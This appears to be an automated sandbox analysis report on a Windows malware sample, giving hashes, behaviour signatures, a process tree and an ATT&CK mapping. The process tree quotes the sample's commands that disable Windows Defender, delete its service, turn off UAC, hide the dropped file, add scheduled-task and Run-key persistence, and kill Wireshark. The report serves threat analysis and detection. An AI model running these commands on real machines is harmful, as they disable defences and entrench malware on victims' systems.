Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-10-2024 01:42
Static task
static1
Behavioral task
behavioral1
Sample
7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe
Resource
win7-20241010-en
General
-
Target
7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe
-
Size
369KB
-
MD5
65c0f9249f64c65cda3e5ea32126fc1f
-
SHA1
d567a001160109f58a4ec43db2abd9971e01afa7
-
SHA256
7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a
-
SHA512
08347609ba2b8ba7a69a147fe7c426baebed93f2a9db3137a9d9ebbc0bf87a775808e55d7c7b7e0b852e8f0065f0204b71fbbadf3cdffc84b1cbea21723e0308
-
SSDEEP
6144:wb8Xw/FxbPPf7QdZE6B5srZP7i+wIUNr4:2/fw5kjwT4
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe dllhost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe dllhost.exe -
Executes dropped EXE 3 IoCs
pid Process 3688 dllhost.exe 3020 dllhost.exe 3952 dllhost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\87078a174f1e0ed9d58afdf2d6d178c3 = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\87078a174f1e0ed9d58afdf2d6d178c3 = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe -
pid Process 4168 powershell.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3220 sc.exe 1124 sc.exe 1076 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe -
Kills process with taskkill 1 IoCs
pid Process 2076 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1796 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 748 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3688 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe Token: SeDebugPrivilege 3688 dllhost.exe Token: SeDebugPrivilege 4168 powershell.exe Token: SeDebugPrivilege 2076 taskkill.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: SeDebugPrivilege 3020 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: SeDebugPrivilege 3952 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe Token: 33 3688 dllhost.exe Token: SeIncBasePriorityPrivilege 3688 dllhost.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 904 wrote to memory of 3688 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 94 PID 904 wrote to memory of 3688 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 94 PID 904 wrote to memory of 3688 904 7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe 94 PID 3688 wrote to memory of 4116 3688 dllhost.exe 97 PID 3688 wrote to memory of 4116 3688 dllhost.exe 97 PID 3688 wrote to memory of 4116 3688 dllhost.exe 97 PID 3688 wrote to memory of 2812 3688 dllhost.exe 99 PID 3688 wrote to memory of 2812 3688 dllhost.exe 99 PID 3688 wrote to memory of 2812 3688 dllhost.exe 99 PID 2812 wrote to memory of 4168 2812 cmd.exe 101 PID 2812 wrote to memory of 4168 2812 cmd.exe 101 PID 2812 wrote to memory of 4168 2812 cmd.exe 101 PID 3688 wrote to memory of 1660 3688 dllhost.exe 102 PID 3688 wrote to memory of 1660 3688 dllhost.exe 102 PID 3688 wrote to memory of 1660 3688 dllhost.exe 102 PID 1660 wrote to memory of 3220 1660 cmd.exe 104 PID 1660 wrote to memory of 3220 1660 cmd.exe 104 PID 1660 wrote to memory of 3220 1660 cmd.exe 104 PID 3688 wrote to memory of 4908 3688 dllhost.exe 105 PID 3688 wrote to memory of 4908 3688 dllhost.exe 105 PID 3688 wrote to memory of 4908 3688 dllhost.exe 105 PID 4908 wrote to memory of 1124 4908 cmd.exe 107 PID 4908 wrote to memory of 1124 4908 cmd.exe 107 PID 4908 wrote to memory of 1124 4908 cmd.exe 107 PID 3688 wrote to memory of 4024 3688 dllhost.exe 108 PID 3688 wrote to memory of 4024 3688 dllhost.exe 108 PID 3688 wrote to memory of 4024 3688 dllhost.exe 108 PID 4024 wrote to memory of 1076 4024 cmd.exe 110 PID 4024 wrote to memory of 1076 4024 cmd.exe 110 PID 4024 wrote to memory of 1076 4024 cmd.exe 110 PID 3688 wrote to memory of 3552 3688 dllhost.exe 111 PID 3688 wrote to memory of 3552 3688 dllhost.exe 111 PID 3688 wrote to memory of 3552 3688 dllhost.exe 111 PID 3688 wrote to memory of 748 3688 dllhost.exe 113 PID 3688 wrote to memory of 748 3688 dllhost.exe 113 PID 3688 wrote to memory of 748 3688 dllhost.exe 113 PID 3688 wrote to memory of 5044 3688 dllhost.exe 115 PID 3688 wrote to memory of 5044 3688 dllhost.exe 115 PID 3688 wrote to memory of 5044 3688 dllhost.exe 115 PID 5044 wrote to memory of 1796 5044 cmd.exe 117 PID 5044 wrote to memory of 1796 5044 cmd.exe 117 PID 5044 wrote to memory of 1796 5044 cmd.exe 117 PID 3688 wrote to memory of 1156 3688 dllhost.exe 118 PID 3688 wrote to memory of 1156 3688 dllhost.exe 118 PID 3688 wrote to memory of 1156 3688 dllhost.exe 118 PID 1156 wrote to memory of 2076 1156 cmd.exe 120 PID 1156 wrote to memory of 2076 1156 cmd.exe 120 PID 1156 wrote to memory of 2076 1156 cmd.exe 120 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4116 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe"C:\Users\Admin\AppData\Local\Temp\7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904 -
C:\ProgramData\dllhost.exe"C:\ProgramData\dllhost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\SysWOW64\attrib.exeattrib +h "C:\ProgramData\dllhost.exe"3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4116
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc query windefend3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\sc.exesc query windefend4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc stop windefend3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\SysWOW64\sc.exesc stop windefend4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete windefend3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\sc.exesc delete windefend4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1076
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn CleanSweepCheck /f3⤵
- System Location Discovery: System Language Discovery
PID:3552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:748
-
-
C:\Windows\SysWOW64\cmd.execmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\reg.exereg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Wireshark.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Wireshark.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
-
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
C:\ProgramData\dllhost.exeC:\ProgramData\dllhost.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3952
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
369KB
MD565c0f9249f64c65cda3e5ea32126fc1f
SHA1d567a001160109f58a4ec43db2abd9971e01afa7
SHA2567522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a
SHA51208347609ba2b8ba7a69a147fe7c426baebed93f2a9db3137a9d9ebbc0bf87a775808e55d7c7b7e0b852e8f0065f0204b71fbbadf3cdffc84b1cbea21723e0308
-
Filesize
319B
MD5824ba7b7eed8b900a98dd25129c4cd83
SHA154478770b2158000ef365591d42977cb854453a1
SHA256d182dd648c92e41cd62dccc65f130c07f0a96c03b32f907c3d1218e9aa5bda03
SHA512ae4f3a9673711ecb6cc5d06874c587341d5094803923b53b6e982278fa64549d7acf866de165e23750facd55da556b6794c0d32f129f4087529c73acd4ffb11e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82